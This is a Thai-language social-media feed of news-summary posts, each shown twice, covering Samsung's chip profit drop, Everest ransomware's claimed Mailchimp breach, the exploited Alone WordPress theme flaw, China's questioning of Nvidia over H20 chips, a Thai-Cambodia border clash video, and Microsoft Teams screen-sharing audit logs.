    แต่กำไรจากการดำเนินงานลดลงเหลือ 4.7 ล้านล้านวอน
    ธุรกิจมือถือยังทำกำไรได้ดี โดยเฉพาะ Galaxy S25 และ A series

    สาเหตุหลักของการตกต่ำคือการส่งออกชิปไปจีนถูกจำกัด และต้นทุนสูงจากโรงงานในสหรัฐฯ
    โรงงานในเท็กซัสมีต้นทุนสูงกว่าที่เกาหลี
    ยังไม่สามารถหาลูกค้าหลักได้สำหรับโรงงานใหม่

    Samsung ได้สัญญาผลิตชิป AI6 ให้ Tesla มูลค่า 16.5 พันล้านดอลลาร์
    เป็นความหวังใหม่ของธุรกิจ foundry
    หุ้น Samsung พุ่งขึ้นกว่า 20% ในเดือนกรกฎาคมหลังข่าวนี้

    บริษัทเตรียมผลิตชิป 2nm สำหรับมือถือในครึ่งปีหลัง
    คาดว่าจะช่วยเพิ่มรายได้ของธุรกิจ foundry
    แข่งขันกับ TSMC และ SK Hynix อย่างเข้มข้น

    Samsung คาดการณ์ว่าธุรกิจจะฟื้นตัวในครึ่งปีหลัง โดยมีแรงหนุนจาก AI และหุ่นยนต์
    CFO ระบุว่าอุตสาหกรรม IT เริ่มฟื้นตัวจากแรงผลักดันของเทคโนโลยีใหม่
    คาดว่าจะมีการเติบโตต่อเนื่องถึงปี 2025

    https://www.techspot.com/news/108897-samsung-posts-brutal-financials-chip-business-profits-plunge.html
    🎙️ เรื่องเล่าจากข่าว: Samsung กับวิกฤติชิป—กำไรหายไป 94% แต่ยังมีความหวังจาก AI และ Tesla Samsung Electronics รายงานผลประกอบการไตรมาส 2 ปี 2025 โดยมีรายได้รวม 74.6 ล้านล้านวอน (ประมาณ 53.7 พันล้านดอลลาร์) ซึ่งเพิ่มขึ้นเล็กน้อยจากปีก่อน แต่สิ่งที่น่าตกใจคือ “กำไรจากธุรกิจชิป” ลดลงถึง 93.8% เหลือเพียง 400 พันล้านวอน จากเดิม 6.45 ล้านล้านวอนในปี 2024 สาเหตุหลักมาจากการส่งออกที่ชะลอตัว, การปรับมูลค่าสินค้าคงคลัง และข้อจำกัดจากมาตรการของสหรัฐฯ ที่ห้ามส่งออกชิปขั้นสูงไปยังจีน แม้สถานการณ์จะดูเลวร้าย แต่ Samsung ยังมีความหวังจากการผลิตชิป AI รุ่นใหม่ให้ Tesla มูลค่าสัญญา 16.5 พันล้านดอลลาร์ และการเตรียมผลิตชิป 2nm สำหรับมือถือในครึ่งปีหลัง ซึ่งอาจช่วยพลิกสถานการณ์ได้ ✅ Samsung รายงานกำไรจากธุรกิจชิปลดลง 93.8% ในไตรมาส 2 ปี 2025 ➡️ เหลือเพียง 400 พันล้านวอน จาก 6.45 ล้านล้านวอนในปีก่อน ➡️ เป็นผลประกอบการที่แย่ที่สุดในรอบ 6 ไตรมาส ✅ รายได้รวมของบริษัทอยู่ที่ 74.6 ล้านล้านวอน เพิ่มขึ้นเล็กน้อยจากปีก่อน ➡️ แต่กำไรจากการดำเนินงานลดลงเหลือ 4.7 ล้านล้านวอน ➡️ ธุรกิจมือถือยังทำกำไรได้ดี โดยเฉพาะ Galaxy S25 และ A series ✅ สาเหตุหลักของการตกต่ำคือการส่งออกชิปไปจีนถูกจำกัด และต้นทุนสูงจากโรงงานในสหรัฐฯ ➡️ โรงงานในเท็กซัสมีต้นทุนสูงกว่าที่เกาหลี ➡️ ยังไม่สามารถหาลูกค้าหลักได้สำหรับโรงงานใหม่ ✅ Samsung ได้สัญญาผลิตชิป AI6 ให้ Tesla มูลค่า 16.5 พันล้านดอลลาร์ ➡️ เป็นความหวังใหม่ของธุรกิจ foundry ➡️ หุ้น Samsung พุ่งขึ้นกว่า 20% ในเดือนกรกฎาคมหลังข่าวนี้ ✅ บริษัทเตรียมผลิตชิป 2nm สำหรับมือถือในครึ่งปีหลัง ➡️ คาดว่าจะช่วยเพิ่มรายได้ของธุรกิจ foundry ➡️ แข่งขันกับ TSMC และ SK Hynix อย่างเข้มข้น ✅ Samsung คาดการณ์ว่าธุรกิจจะฟื้นตัวในครึ่งปีหลัง โดยมีแรงหนุนจาก AI และหุ่นยนต์ ➡️ CFO ระบุว่าอุตสาหกรรม IT เริ่มฟื้นตัวจากแรงผลักดันของเทคโนโลยีใหม่ ➡️ คาดว่าจะมีการเติบโตต่อเนื่องถึงปี 2025 https://www.techspot.com/news/108897-samsung-posts-brutal-financials-chip-business-profits-plunge.html
    WWW.TECHSPOT.COM
    Samsung posts brutal financials as chip business profits plunge by 94%
    Samsung Electronics recently posted its second-quarter financial results, and they're worse than expected. According to CBNC, the Korean tech giant reported revenue of 74.6 trillion won ($53.7...
    0 ความคิดเห็น 0 การแบ่งปัน 69 มุมมอง 0 รีวิว
  • เรื่องเล่าจากข่าว: Everest Ransomware กับการโจมตี Mailchimp ที่กลายเป็นเรื่องตลกในวงการไซเบอร์

    ปลายเดือนกรกฎาคม 2025 กลุ่ม Everest ransomware ได้โพสต์บนเว็บไซต์มืดว่า พวกเขาเจาะระบบของ Mailchimp—แพลตฟอร์มการตลาดผ่านอีเมลชื่อดัง—และขโมยข้อมูลขนาด 767 MB รวม 943,536 บรรทัด ซึ่งอ้างว่าเป็น “เอกสารภายในบริษัท” และ “ข้อมูลส่วนตัวของลูกค้า”

    แต่เมื่อผู้เชี่ยวชาญด้านความปลอดภัยได้ตรวจสอบตัวอย่างข้อมูล พบว่าเป็นเพียงข้อมูลธุรกิจทั่วไป เช่น อีเมลบริษัท, โดเมน, เบอร์โทร, เมือง, ประเทศ, ลิงก์โซเชียลมีเดีย และเทคโนโลยีที่ใช้ ไม่ใช่ข้อมูลลับหรือข้อมูลภายในที่สำคัญของ Mailchimp

    ชุมชนไซเบอร์จึงพากันหัวเราะเยาะการโจมตีครั้งนี้ โดยเปรียบเทียบว่า “เหมือนข้อมูลของลูกค้าคนเดียว” หรือ “แค่เศษเสี้ยวของข้อมูลที่ Mailchimp ส่งออกในหนึ่งวินาที”

    แม้จะดูเล็กน้อย แต่การโจมตีนี้ยังสะท้อนแนวโน้มที่น่ากังวล—การเพิ่มขึ้นของ ransomware ทั่วโลกในเดือนกรกฎาคม โดยมีหลายกลุ่มโจมตีองค์กรใหญ่ เช่น Dollar Tree, Albavision และ NASCAR

    Everest ransomware อ้างว่าเจาะระบบ Mailchimp และขโมยข้อมูล 767 MB รวม 943,536 บรรทัด
    อ้างว่าเป็นเอกสารภายในและข้อมูลลูกค้า
    โพสต์บนเว็บไซต์มืดพร้อมตัวอย่างข้อมูล

    ข้อมูลที่หลุดเป็นข้อมูลธุรกิจทั่วไป ไม่ใช่ข้อมูลลับของ Mailchimp
    เช่น อีเมลบริษัท, โดเมน, เบอร์โทร, เทคโนโลยีที่ใช้
    ดูเหมือนมาจากการ export จากระบบ CRM มากกว่าระบบภายใน

    ชุมชนผู้เชี่ยวชาญด้านไซเบอร์เยาะเย้ยการโจมตีครั้งนี้ว่า “เล็กเกินคาด”
    เปรียบเทียบว่าเป็นข้อมูลของลูกค้าคนเดียว
    คาดหวังว่าจะมีข้อมูลระดับ GB หรือ TB จากบริษัทใหญ่แบบ Mailchimp

    Everest ransomware เคยโจมตีบริษัทใหญ่มาแล้ว เช่น Coca-Cola และรัฐบาลในอเมริกาใต้
    ใช้โมเดล double extortion: เข้ารหัสไฟล์ + ขู่เปิดเผยข้อมูล
    ล่าสุดเริ่มขายสิทธิ์เข้าถึงระบบให้กลุ่มอื่นแทนการโจมตีเอง

    การโจมตี Mailchimp เป็นส่วนหนึ่งของคลื่น ransomware ที่พุ่งสูงในเดือนกรกฎาคม 2025
    INC ransomware อ้างว่าได้ข้อมูล 1.2 TB จาก Dollar Tree
    GLOBAL GROUP โจมตี Albavision ได้ข้อมูล 400 GB
    Medusa ransomware เรียกค่าไถ่ NASCAR มูลค่า $4 ล้าน

    https://hackread.com/everest-ransomware-claims-mailchimp-small-breach/
    🎙️ เรื่องเล่าจากข่าว: Everest Ransomware กับการโจมตี Mailchimp ที่กลายเป็นเรื่องตลกในวงการไซเบอร์ ปลายเดือนกรกฎาคม 2025 กลุ่ม Everest ransomware ได้โพสต์บนเว็บไซต์มืดว่า พวกเขาเจาะระบบของ Mailchimp—แพลตฟอร์มการตลาดผ่านอีเมลชื่อดัง—และขโมยข้อมูลขนาด 767 MB รวม 943,536 บรรทัด ซึ่งอ้างว่าเป็น “เอกสารภายในบริษัท” และ “ข้อมูลส่วนตัวของลูกค้า” แต่เมื่อผู้เชี่ยวชาญด้านความปลอดภัยได้ตรวจสอบตัวอย่างข้อมูล พบว่าเป็นเพียงข้อมูลธุรกิจทั่วไป เช่น อีเมลบริษัท, โดเมน, เบอร์โทร, เมือง, ประเทศ, ลิงก์โซเชียลมีเดีย และเทคโนโลยีที่ใช้ ไม่ใช่ข้อมูลลับหรือข้อมูลภายในที่สำคัญของ Mailchimp ชุมชนไซเบอร์จึงพากันหัวเราะเยาะการโจมตีครั้งนี้ โดยเปรียบเทียบว่า “เหมือนข้อมูลของลูกค้าคนเดียว” หรือ “แค่เศษเสี้ยวของข้อมูลที่ Mailchimp ส่งออกในหนึ่งวินาที” แม้จะดูเล็กน้อย แต่การโจมตีนี้ยังสะท้อนแนวโน้มที่น่ากังวล—การเพิ่มขึ้นของ ransomware ทั่วโลกในเดือนกรกฎาคม โดยมีหลายกลุ่มโจมตีองค์กรใหญ่ เช่น Dollar Tree, Albavision และ NASCAR ✅ Everest ransomware อ้างว่าเจาะระบบ Mailchimp และขโมยข้อมูล 767 MB รวม 943,536 บรรทัด ➡️ อ้างว่าเป็นเอกสารภายในและข้อมูลลูกค้า ➡️ โพสต์บนเว็บไซต์มืดพร้อมตัวอย่างข้อมูล ✅ ข้อมูลที่หลุดเป็นข้อมูลธุรกิจทั่วไป ไม่ใช่ข้อมูลลับของ Mailchimp ➡️ เช่น อีเมลบริษัท, โดเมน, เบอร์โทร, เทคโนโลยีที่ใช้ ➡️ ดูเหมือนมาจากการ export จากระบบ CRM มากกว่าระบบภายใน ✅ ชุมชนผู้เชี่ยวชาญด้านไซเบอร์เยาะเย้ยการโจมตีครั้งนี้ว่า “เล็กเกินคาด” ➡️ เปรียบเทียบว่าเป็นข้อมูลของลูกค้าคนเดียว ➡️ คาดหวังว่าจะมีข้อมูลระดับ GB หรือ TB จากบริษัทใหญ่แบบ Mailchimp ✅ Everest ransomware เคยโจมตีบริษัทใหญ่มาแล้ว เช่น Coca-Cola และรัฐบาลในอเมริกาใต้ ➡️ ใช้โมเดล double extortion: เข้ารหัสไฟล์ + ขู่เปิดเผยข้อมูล ➡️ ล่าสุดเริ่มขายสิทธิ์เข้าถึงระบบให้กลุ่มอื่นแทนการโจมตีเอง ✅ การโจมตี Mailchimp เป็นส่วนหนึ่งของคลื่น ransomware ที่พุ่งสูงในเดือนกรกฎาคม 2025 ➡️ INC ransomware อ้างว่าได้ข้อมูล 1.2 TB จาก Dollar Tree ➡️ GLOBAL GROUP โจมตี Albavision ได้ข้อมูล 400 GB ➡️ Medusa ransomware เรียกค่าไถ่ NASCAR มูลค่า $4 ล้าน https://hackread.com/everest-ransomware-claims-mailchimp-small-breach/
    HACKREAD.COM
    Everest Ransomware Claims Mailchimp as New Victim in Relatively Small Breach
    Follow us on Bluesky, Twitter (X), Mastodon and Facebook at @Hackread
    0 ความคิดเห็น 0 การแบ่งปัน 70 มุมมอง 0 รีวิว
  • ไทม์ไลน์ปะทะเดือด ชายแดนไทย-กัมพูชา ตั้งแต่ 24 กรกฎาคม จนถึงวันนี้ ที่ผืนแผ่นดินไทยจะยังคงอยู่ตลอดไปจนชั่วลูกชั่วหลาน

    #Sondhi #Sondhitalk #สนธิ #สนธิลิ้มทองกุล #ไทยเขมร #ปะทะเดือด #จับประเด็น #ไทม์ไลน์ปะทะเดือดชายแดนไทย #TruthFromThailand #CambodiaNoCeasefire #Hunsenfiredfirst #CambodianDeception #Thaitimes #กัมพูชายิงก่อน #เขมรละเมิดหยุดยิง #ความจริงจากไทย #News1 #Shorts
    ไทม์ไลน์ปะทะเดือด ชายแดนไทย-กัมพูชา ตั้งแต่ 24 กรกฎาคม จนถึงวันนี้ ที่ผืนแผ่นดินไทยจะยังคงอยู่ตลอดไปจนชั่วลูกชั่วหลาน #Sondhi #Sondhitalk #สนธิ #สนธิลิ้มทองกุล #ไทยเขมร #ปะทะเดือด #จับประเด็น #ไทม์ไลน์ปะทะเดือดชายแดนไทย #TruthFromThailand #CambodiaNoCeasefire #Hunsenfiredfirst #CambodianDeception #Thaitimes #กัมพูชายิงก่อน #เขมรละเมิดหยุดยิง #ความจริงจากไทย #News1 #Shorts
    Like
    7
    0 ความคิดเห็น 0 การแบ่งปัน 901 มุมมอง 0 0 รีวิว
  • เรื่องเล่าจากข่าว: ธีม WordPress “Alone” ถูกเจาะทะลุ—เปิดทางให้แฮกเกอร์ยึดเว็บแบบเงียบ ๆ

    ธีม Alone – Charity Multipurpose Non-profit ซึ่งถูกใช้ในเว็บไซต์องค์กรการกุศลกว่า 200 แห่งทั่วโลก ถูกพบช่องโหว่ร้ายแรง CVE-2025-4394 ที่เปิดให้ผู้ไม่ประสงค์ดีสามารถอัปโหลดไฟล์ ZIP ที่มี backdoor PHP เพื่อรันคำสั่งจากระยะไกล และสร้างบัญชีผู้ดูแลระบบปลอมได้ทันที

    ช่องโหว่นี้มีอยู่ในทุกเวอร์ชันก่อน 7.8.5 ซึ่งเพิ่งได้รับการแก้ไขเมื่อวันที่ 16 มิถุนายน 2025 แต่การโจมตีเริ่มขึ้นตั้งแต่วันที่ 12 กรกฎาคม ก่อนที่ช่องโหว่จะถูกเปิดเผยต่อสาธารณะเพียง 2 วัน โดย Wordfence รายงานว่ามีความพยายามโจมตีมากกว่า 120,000 ครั้งแล้วจากหลาย IP ทั่วโลก

    แฮกเกอร์ใช้ช่องโหว่นี้เพื่อ:
    - สร้างบัญชีแอดมินปลอม
    - อัปโหลดมัลแวร์
    - เปลี่ยนเส้นทางผู้เยี่ยมชมไปยังเว็บฟิชชิ่ง
    - ใช้เว็บไซต์เป็นฐานปล่อยมัลแวร์อื่น

    ธีม Alone – Charity Multipurpose ถูกพบช่องโหว่ร้ายแรง CVE-2025-4394
    คะแนนความรุนแรง 9.8/10
    เปิดทางให้แฮกเกอร์อัปโหลดไฟล์และรันคำสั่งจากระยะไกล

    ช่องโหว่นี้มีอยู่ในทุกเวอร์ชันก่อน 7.8.5
    เวอร์ชันที่ปลอดภัยคือ 7.8.5 ขึ้นไป
    ผู้ใช้ควรอัปเดตทันทีเพื่อป้องกันการโจมตี

    Wordfence รายงานว่ามีการโจมตีมากกว่า 120,000 ครั้งแล้ว
    เริ่มโจมตีตั้งแต่วันที่ 12 กรกฎาคม 2025
    ใช้ไฟล์ ZIP ที่มี backdoor เช่น wp-classic-editor.zip

    แฮกเกอร์สามารถสร้างบัญชีแอดมินปลอมและควบคุมเว็บไซต์ได้เต็มรูปแบบ
    ใช้เว็บไซต์เป็นฐานปล่อยมัลแวร์หรือ redirect ไปยังเว็บอันตราย
    อาจส่งผลต่อชื่อเสียงและข้อมูลผู้ใช้งาน

    ธีมนี้ถูกใช้ในเว็บไซต์องค์กรการกุศลและ NGO กว่า 200 แห่งทั่วโลก
    มีฟีเจอร์ donation integration และรองรับ Elementor/WPBakery
    เป็นธีมเชิงพาณิชย์ที่ได้รับความนิยมในกลุ่มไม่แสวงหากำไร

    หากยังใช้เวอร์ชันก่อน 7.8.5 เว็บไซต์ของคุณเสี่ยงต่อการถูกยึดครองทันที
    ช่องโหว่เปิดให้ผู้ไม่ประสงค์ดีเข้าถึงระบบโดยไม่ต้องล็อกอิน
    อาจถูกใช้เป็นฐานปล่อยมัลแวร์หรือขโมยข้อมูลผู้ใช้

    การโจมตีเกิดขึ้นก่อนการเปิดเผยช่องโหว่ต่อสาธารณะ
    แสดงว่าแฮกเกอร์ติดตามการเปลี่ยนแปลงโค้ดอย่างใกล้ชิด
    อาจมีการโจมตีแบบ zero-day ในธีมอื่น ๆ อีก

    ผู้ดูแลเว็บไซต์อาจไม่รู้ว่าถูกเจาะ เพราะมัลแวร์ถูกซ่อนไว้อย่างแนบเนียน
    เช่น การสร้างผู้ใช้ชื่อ “officialwp” หรือการซ่อนไฟล์ใน mu-plugins
    ต้องตรวจสอบ log และผู้ใช้แอดมินอย่างละเอียด

    การใช้ธีมและปลั๊กอินจากแหล่งที่ไม่ปลอดภัยเพิ่มความเสี่ยงอย่างมาก
    ธีมเชิงพาณิชย์ที่ไม่มีการอัปเดตสม่ำเสมออาจมีช่องโหว่
    ควรใช้ธีมที่ได้รับการตรวจสอบจากผู้เชี่ยวชาญด้านความปลอดภัย

    https://www.techradar.com/pro/security/hackers-target-critical-wordpress-theme-flaw-thousands-of-sites-at-risk-from-potential-takeover-find-out-if-youre-affected
    🎙️ เรื่องเล่าจากข่าว: ธีม WordPress “Alone” ถูกเจาะทะลุ—เปิดทางให้แฮกเกอร์ยึดเว็บแบบเงียบ ๆ ธีม Alone – Charity Multipurpose Non-profit ซึ่งถูกใช้ในเว็บไซต์องค์กรการกุศลกว่า 200 แห่งทั่วโลก ถูกพบช่องโหว่ร้ายแรง CVE-2025-4394 ที่เปิดให้ผู้ไม่ประสงค์ดีสามารถอัปโหลดไฟล์ ZIP ที่มี backdoor PHP เพื่อรันคำสั่งจากระยะไกล และสร้างบัญชีผู้ดูแลระบบปลอมได้ทันที ช่องโหว่นี้มีอยู่ในทุกเวอร์ชันก่อน 7.8.5 ซึ่งเพิ่งได้รับการแก้ไขเมื่อวันที่ 16 มิถุนายน 2025 แต่การโจมตีเริ่มขึ้นตั้งแต่วันที่ 12 กรกฎาคม ก่อนที่ช่องโหว่จะถูกเปิดเผยต่อสาธารณะเพียง 2 วัน โดย Wordfence รายงานว่ามีความพยายามโจมตีมากกว่า 120,000 ครั้งแล้วจากหลาย IP ทั่วโลก แฮกเกอร์ใช้ช่องโหว่นี้เพื่อ: - สร้างบัญชีแอดมินปลอม - อัปโหลดมัลแวร์ - เปลี่ยนเส้นทางผู้เยี่ยมชมไปยังเว็บฟิชชิ่ง - ใช้เว็บไซต์เป็นฐานปล่อยมัลแวร์อื่น ✅ ธีม Alone – Charity Multipurpose ถูกพบช่องโหว่ร้ายแรง CVE-2025-4394 ➡️ คะแนนความรุนแรง 9.8/10 ➡️ เปิดทางให้แฮกเกอร์อัปโหลดไฟล์และรันคำสั่งจากระยะไกล ✅ ช่องโหว่นี้มีอยู่ในทุกเวอร์ชันก่อน 7.8.5 ➡️ เวอร์ชันที่ปลอดภัยคือ 7.8.5 ขึ้นไป ➡️ ผู้ใช้ควรอัปเดตทันทีเพื่อป้องกันการโจมตี ✅ Wordfence รายงานว่ามีการโจมตีมากกว่า 120,000 ครั้งแล้ว ➡️ เริ่มโจมตีตั้งแต่วันที่ 12 กรกฎาคม 2025 ➡️ ใช้ไฟล์ ZIP ที่มี backdoor เช่น wp-classic-editor.zip ✅ แฮกเกอร์สามารถสร้างบัญชีแอดมินปลอมและควบคุมเว็บไซต์ได้เต็มรูปแบบ ➡️ ใช้เว็บไซต์เป็นฐานปล่อยมัลแวร์หรือ redirect ไปยังเว็บอันตราย ➡️ อาจส่งผลต่อชื่อเสียงและข้อมูลผู้ใช้งาน ✅ ธีมนี้ถูกใช้ในเว็บไซต์องค์กรการกุศลและ NGO กว่า 200 แห่งทั่วโลก ➡️ มีฟีเจอร์ donation integration และรองรับ Elementor/WPBakery ➡️ เป็นธีมเชิงพาณิชย์ที่ได้รับความนิยมในกลุ่มไม่แสวงหากำไร ‼️ หากยังใช้เวอร์ชันก่อน 7.8.5 เว็บไซต์ของคุณเสี่ยงต่อการถูกยึดครองทันที ⛔ ช่องโหว่เปิดให้ผู้ไม่ประสงค์ดีเข้าถึงระบบโดยไม่ต้องล็อกอิน ⛔ อาจถูกใช้เป็นฐานปล่อยมัลแวร์หรือขโมยข้อมูลผู้ใช้ ‼️ การโจมตีเกิดขึ้นก่อนการเปิดเผยช่องโหว่ต่อสาธารณะ ⛔ แสดงว่าแฮกเกอร์ติดตามการเปลี่ยนแปลงโค้ดอย่างใกล้ชิด ⛔ อาจมีการโจมตีแบบ zero-day ในธีมอื่น ๆ อีก ‼️ ผู้ดูแลเว็บไซต์อาจไม่รู้ว่าถูกเจาะ เพราะมัลแวร์ถูกซ่อนไว้อย่างแนบเนียน ⛔ เช่น การสร้างผู้ใช้ชื่อ “officialwp” หรือการซ่อนไฟล์ใน mu-plugins ⛔ ต้องตรวจสอบ log และผู้ใช้แอดมินอย่างละเอียด ‼️ การใช้ธีมและปลั๊กอินจากแหล่งที่ไม่ปลอดภัยเพิ่มความเสี่ยงอย่างมาก ⛔ ธีมเชิงพาณิชย์ที่ไม่มีการอัปเดตสม่ำเสมออาจมีช่องโหว่ ⛔ ควรใช้ธีมที่ได้รับการตรวจสอบจากผู้เชี่ยวชาญด้านความปลอดภัย https://www.techradar.com/pro/security/hackers-target-critical-wordpress-theme-flaw-thousands-of-sites-at-risk-from-potential-takeover-find-out-if-youre-affected
    0 ความคิดเห็น 0 การแบ่งปัน 123 มุมมอง 0 รีวิว
  • เรื่องเล่าจากข่าว: “H20 ของ Nvidia” กลายเป็นจุดชนวนใหม่ในสงครามเทคโนโลยีระหว่างจีนกับสหรัฐ

    หลังจากสหรัฐฯ ยกเลิกคำสั่งห้ามส่งออกชิป H20 ของ Nvidia ไปยังจีนเมื่อเดือนกรกฎาคม 2025 ซึ่งก่อนหน้านั้นเคยถูกแบนในเดือนเมษายนเนื่องจากข้อกังวลด้านความมั่นคง ล่าสุด Cyberspace Administration of China (CAC) ได้เรียกตัว Nvidia เข้าพบเพื่อขอคำชี้แจงเกี่ยวกับ “ความเสี่ยงด้านความปลอดภัย” ของชิป H20 ที่กำลังจะกลับมาวางขายในจีน

    CAC อ้างว่าได้รับข้อมูลจากผู้เชี่ยวชาญด้าน AI ของสหรัฐฯ ว่าชิป H20 อาจมีฟีเจอร์ “ติดตามตำแหน่ง” และ “ปิดการทำงานจากระยะไกล” ซึ่งอาจกระทบต่อความเป็นส่วนตัวของผู้ใช้ชาวจีน และละเมิดกฎหมายความปลอดภัยไซเบอร์ของประเทศ

    ด้าน Nvidia ยืนยันว่า “ไม่มี backdoor” ในชิปของตน และให้ความสำคัญกับความปลอดภัยไซเบอร์อย่างสูงสุด พร้อมเตรียมส่งเอกสารชี้แจงตามคำขอของ CAC

    ขณะเดียวกัน นักการเมืองสหรัฐฯ ก็เคยเสนอให้มีการติดตั้งระบบติดตามในชิปที่ส่งออกไปต่างประเทศ เพื่อป้องกันการลักลอบนำไปใช้ในทางที่ผิด โดยเฉพาะในจีน ซึ่งอาจนำไปใช้พัฒนา AI ทางทหารหรือระบบเซ็นเซอร์ตรวจสอบประชาชน

    จีนเรียกตัว Nvidia เข้าพบเพื่อขอคำชี้แจงเกี่ยวกับความเสี่ยงด้านความปลอดภัยของชิป H20
    CAC ต้องการเอกสารสนับสนุนเกี่ยวกับความเสี่ยงด้าน backdoor และการติดตาม
    อ้างอิงจากรายงานของผู้เชี่ยวชาญ AI สหรัฐฯ

    ชิป H20 ถูกพัฒนาขึ้นเพื่อให้ผ่านข้อจำกัดการส่งออกของสหรัฐฯ โดยมีประสิทธิภาพต่ำกว่าชิป H100
    ถูกแบนในเดือนเมษายน 2025 และกลับมาขายได้ในเดือนกรกฎาคม
    Nvidia สั่งผลิตเพิ่มอีก 300,000 ตัวจาก TSMC เพื่อรองรับความต้องการในจีน

    Nvidia ยืนยันว่าไม่มี backdoor ในชิปของตน และให้ความสำคัญกับความปลอดภัยไซเบอร์
    “ไม่มีช่องทางลับในการควบคุมหรือเข้าถึงจากระยะไกล”
    พร้อมส่งเอกสารชี้แจงตามคำขอของ CAC

    นักการเมืองสหรัฐฯ เสนอให้มีการติดตั้งระบบติดตามในชิปที่ส่งออกไปต่างประเทศ
    เช่น Chip Security Act ที่เสนอให้มีระบบตรวจสอบตำแหน่งและการใช้งาน
    ยังไม่มีการผ่านเป็นกฎหมายอย่างเป็นทางการ

    จีนยังคงต้องพึ่งพาชิปของ Nvidia สำหรับงานวิจัยและการพัฒนา AI ภายในประเทศ
    แม้จะมีการผลักดันชิปภายในประเทศ เช่น Huawei 910C
    แต่ยังไม่สามารถทดแทน Nvidia ได้ในหลายด้าน

    https://www.techspot.com/news/108886-china-summons-nvidia-over-potential-security-concerns-h20.html
    🧠 เรื่องเล่าจากข่าว: “H20 ของ Nvidia” กลายเป็นจุดชนวนใหม่ในสงครามเทคโนโลยีระหว่างจีนกับสหรัฐ หลังจากสหรัฐฯ ยกเลิกคำสั่งห้ามส่งออกชิป H20 ของ Nvidia ไปยังจีนเมื่อเดือนกรกฎาคม 2025 ซึ่งก่อนหน้านั้นเคยถูกแบนในเดือนเมษายนเนื่องจากข้อกังวลด้านความมั่นคง ล่าสุด Cyberspace Administration of China (CAC) ได้เรียกตัว Nvidia เข้าพบเพื่อขอคำชี้แจงเกี่ยวกับ “ความเสี่ยงด้านความปลอดภัย” ของชิป H20 ที่กำลังจะกลับมาวางขายในจีน CAC อ้างว่าได้รับข้อมูลจากผู้เชี่ยวชาญด้าน AI ของสหรัฐฯ ว่าชิป H20 อาจมีฟีเจอร์ “ติดตามตำแหน่ง” และ “ปิดการทำงานจากระยะไกล” ซึ่งอาจกระทบต่อความเป็นส่วนตัวของผู้ใช้ชาวจีน และละเมิดกฎหมายความปลอดภัยไซเบอร์ของประเทศ ด้าน Nvidia ยืนยันว่า “ไม่มี backdoor” ในชิปของตน และให้ความสำคัญกับความปลอดภัยไซเบอร์อย่างสูงสุด พร้อมเตรียมส่งเอกสารชี้แจงตามคำขอของ CAC ขณะเดียวกัน นักการเมืองสหรัฐฯ ก็เคยเสนอให้มีการติดตั้งระบบติดตามในชิปที่ส่งออกไปต่างประเทศ เพื่อป้องกันการลักลอบนำไปใช้ในทางที่ผิด โดยเฉพาะในจีน ซึ่งอาจนำไปใช้พัฒนา AI ทางทหารหรือระบบเซ็นเซอร์ตรวจสอบประชาชน ✅ จีนเรียกตัว Nvidia เข้าพบเพื่อขอคำชี้แจงเกี่ยวกับความเสี่ยงด้านความปลอดภัยของชิป H20 ➡️ CAC ต้องการเอกสารสนับสนุนเกี่ยวกับความเสี่ยงด้าน backdoor และการติดตาม ➡️ อ้างอิงจากรายงานของผู้เชี่ยวชาญ AI สหรัฐฯ ✅ ชิป H20 ถูกพัฒนาขึ้นเพื่อให้ผ่านข้อจำกัดการส่งออกของสหรัฐฯ โดยมีประสิทธิภาพต่ำกว่าชิป H100 ➡️ ถูกแบนในเดือนเมษายน 2025 และกลับมาขายได้ในเดือนกรกฎาคม ➡️ Nvidia สั่งผลิตเพิ่มอีก 300,000 ตัวจาก TSMC เพื่อรองรับความต้องการในจีน ✅ Nvidia ยืนยันว่าไม่มี backdoor ในชิปของตน และให้ความสำคัญกับความปลอดภัยไซเบอร์ ➡️ “ไม่มีช่องทางลับในการควบคุมหรือเข้าถึงจากระยะไกล” ➡️ พร้อมส่งเอกสารชี้แจงตามคำขอของ CAC ✅ นักการเมืองสหรัฐฯ เสนอให้มีการติดตั้งระบบติดตามในชิปที่ส่งออกไปต่างประเทศ ➡️ เช่น Chip Security Act ที่เสนอให้มีระบบตรวจสอบตำแหน่งและการใช้งาน ➡️ ยังไม่มีการผ่านเป็นกฎหมายอย่างเป็นทางการ ✅ จีนยังคงต้องพึ่งพาชิปของ Nvidia สำหรับงานวิจัยและการพัฒนา AI ภายในประเทศ ➡️ แม้จะมีการผลักดันชิปภายในประเทศ เช่น Huawei 910C ➡️ แต่ยังไม่สามารถทดแทน Nvidia ได้ในหลายด้าน https://www.techspot.com/news/108886-china-summons-nvidia-over-potential-security-concerns-h20.html
    WWW.TECHSPOT.COM
    China summons Nvidia over potential security concerns in H20 chips
    The Cyberspace Administration of China (CAC) said that Nvidia was asked to "clarify and submit relevant supporting documentation regarding security risks, including potential vulnerabilities and backdoors, associated...
    0 ความคิดเห็น 0 การแบ่งปัน 98 มุมมอง 0 รีวิว
  • เรื่องเล่าจากข่าว: “ดูว่าใครแชร์อะไร กับใคร เมื่อไหร่”—Microsoft Teams เปิดให้ตรวจสอบการแชร์หน้าจอแล้ว

    ในเดือนกรกฎาคม 2025 Microsoft ได้เปิดตัวฟีเจอร์ใหม่ใน Microsoft Teams ที่ให้ผู้ดูแลระบบ (Teams admins) เข้าถึงข้อมูล telemetry และ audit logs สำหรับการแชร์หน้าจอ (screen sharing) และการควบคุมหน้าจอ (Take/Give/Request control) ได้โดยตรงผ่าน Microsoft Purview

    ข้อมูลที่สามารถตรวจสอบได้ ได้แก่:
    - ใครเริ่มแชร์หน้าจอ และเมื่อไหร่
    - แชร์ให้ใครดู
    - ใครขอควบคุมหน้าจอ และใครอนุญาต
    - เวลาเริ่มและหยุดการแชร์
    - การยอมรับคำขอควบคุมหน้าจอ

    ฟีเจอร์นี้ช่วยให้ผู้ดูแลระบบสามารถตรวจสอบพฤติกรรมต้องสงสัย เช่น การแชร์ข้อมูลลับกับบุคคลภายนอก หรือการเข้าควบคุมหน้าจอโดยไม่ได้รับอนุญาต

    การใช้งานทำได้ผ่าน Microsoft Purview โดยเลือกเมนู Audit → New Search แล้วกรอกคำค้น เช่น “screenShared” หรือ “MeetingParticipantDetail” เพื่อดูข้อมูลย้อนหลัง และสามารถ export เป็นไฟล์ CSV ได้

    Microsoft เปิดให้ Teams admins เข้าถึง audit logs สำหรับการแชร์หน้าจอผ่าน Microsoft Purview
    ตรวจสอบได้ว่าใครแชร์หน้าจอ, แชร์ให้ใคร, และเมื่อไหร่
    รองรับการตรวจสอบคำสั่ง Take, Give, Request control

    ข้อมูล telemetry ช่วยให้ตรวจสอบพฤติกรรมต้องสงสัยได้แบบละเอียด
